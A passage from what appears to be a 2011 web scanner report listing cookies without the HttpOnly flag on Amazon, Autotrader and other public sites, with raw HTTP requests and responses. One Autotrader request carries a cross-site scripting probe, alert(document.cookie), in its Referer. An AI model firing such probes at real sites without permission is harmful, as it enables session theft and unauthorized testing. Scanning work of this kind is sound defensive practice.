p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: PlF2/QEU0gca0keikYl5AAloXjb8+bYTwS4SenUAsR2Hj9g7OaMuaVTR9h/a5nWz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

14.99. http://www.amazon.com/gp/css/homepage.html/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/css/homepage.html/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/css/homepage.html/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:28 GMT
Server: Server
x-amz-id-1: 1JYB2VNQP8C55BB9NAK4
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 3icGnhgAgfZUWLOZdmzfhDcF9EfU4+FBrZdxGpszK5HnHwSQN6UjuQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16226


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

14.100. http://www.amazon.com/gp/gc/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/gc/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/gc/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 1ARA2838P595NDE5BZ28
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NeLbCQZvKIRHPa3udnf+jNalHfYaZDtVVTT+qpr1m3zHmdMhK0a3n/4PuJMtXurr
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16234


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

14.101. http://www.amazon.com/gp/product/0596804946

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0596804946

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:19 GMT
Server: Server
x-amz-id-1: 1GMNYJAKA4TJD7BE20PT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: rRZgZjI7evzN2uK+PGBNvEWrhG1Qajm2TBox690BsTrGBbLn0XvjcMMT1QA/Cp32
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
Content-Length: 407243


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

14.102. http://www.amazon.com/gp/site-directory/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/site-directory/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 040X2S941YQ8YM9GDF3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: sl07PFCJKDLvXHwNIxyGk0Yh+o6P2TnOLpehS7jphg0PPwo4AItme2BkehKpR0Nz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 106589


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FFFFFF; color: #000000; margin-
...[SNIP]...

14.103. http://www.amazon.com/music-rock-classical-pop-jazz/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /music-rock-classical-pop-jazz/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /music-rock-classical-pop-jazz/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:26 GMT
Server: Server
x-amz-id-1: 1AWZZSHBMYQFXNK2TZN0
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XKxFVzH0piW6bh12P3jE4jVP61ZQQfn1i5c66cBPEQVMNGeFeEPIQFWJv/MdsXCT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

14.104. http://www.amazon.com/toys/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /toys/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /toys/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:33 GMT
Server: Server
x-amz-id-1: 036W1XT31RW6BQB2XSMW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kZWb7JrdWVARHF80ONC/A4r3Jr1hWDeGnSCm1H+YTMFGi/6Qk4MnrnFI1vNP5uxA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

14.105. http://www.amazon.com/wishlist/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /wishlist/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wishlist/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:28 GMT
Server: Server
x-amz-id-1: 0Z3Y87WRFKJ1Q11M2G0K
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Ego3ck6jsiMYzZQy5mq4k0LI7SMs9DdekEwnw6kJ4wxR9tBB8EcVyWP5nD7nnlOe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16234


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

14.106. http://www.amazon.com/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Server
x-amz-id-1: 0V0RKC4376K2YMDSV37C
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: A6zGDRGUjbMlYPxnk59HD10S5EjU04c0tVHuI5EisIW4w9Xtq+yRZhGulJQoodS8
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16197


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

14.107. http://www.amazon.com/x22/x3e/x3cli

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /x22/x3e/x3cli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Server
x-amz-id-1: 0PCK2Z2XXY6R48VWHP5C
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: c5+vukLbuLrPzb9XbB4xNsX5E9P5pKl7cpikC6014m92Vy9HvsdHPJ1S4ooy8A74
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16197


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

14.108. http://www.americascupmedia.com/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...

14.109. http://www.aspirationtech.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aspirationtech.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
Last-Modified: Tue, 25 Jan 2011 14:09:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-C" lang="en-C">
<head>
<
...[SNIP]...

14.110. http://www.aub.kg/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aub.kg
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=0i6vrg28rec1drhtc3kera1913; path=/
  • umicms_session=1919df951921d97c2f391556dd953a37; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.aub.kg
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: post-check=0, pre-check=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=0i6vrg28rec1drhtc3kera1913; path=/
Set-Cookie: umicms_session=1919df951921d97c2f391556dd953a37; path=/
Last-Modified: Fri, 24 Sep 2010 04:34:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20408

...    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...

14.111. http://www.autocheck.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autocheck.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=dmCvyWYCQne4gqVC62; path=/
  • Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
  • referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:12 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT
Set-Cookie: JSESSIONID=dmCvyWYCQne4gqVC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 29237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1
...[SNIP]...

14.112. http://www.autotrader.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=4C16AC510625457D15A58A2D4558BCD7; Path=/
  • BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C16AC510625457D15A58A2D4558BCD7; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:28 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/
Content-Length: 59997


<!DOCTYPE html P
...[SNIP]...

14.113. http://www.autotrader.com/ajax/backButtonFix.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /ajax/backButtonFix.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/backButtonFix.jsp?Log=0&rand=7661 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34

/fyc/index.jsp?bkms=1295921992363

14.114. http://www.autotrader.com/hornav/trader/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=D94B6DD5A6F34AF02DDCF09FF98C7E8B; Path=/
  • BIGipServerAT-Production_hhtp=2167563786.61475.0000; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hornav/trader/index.jsp HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=D94B6DD5A6F34AF02DDCF09FF98C7E8B; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:10 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=2167563786.61475.0000; path=/
Content-Length: 43738


<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:
...[SNIP]...

14.115. http://www.barkerstores.com/soundings/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.barkerstores.com
Path:   /soundings/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
  • chk_support=check; path=/
  • SOU_CustID=SOU13989; path=/
  • SOU_CartID=SOU-9E35923E-12511; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
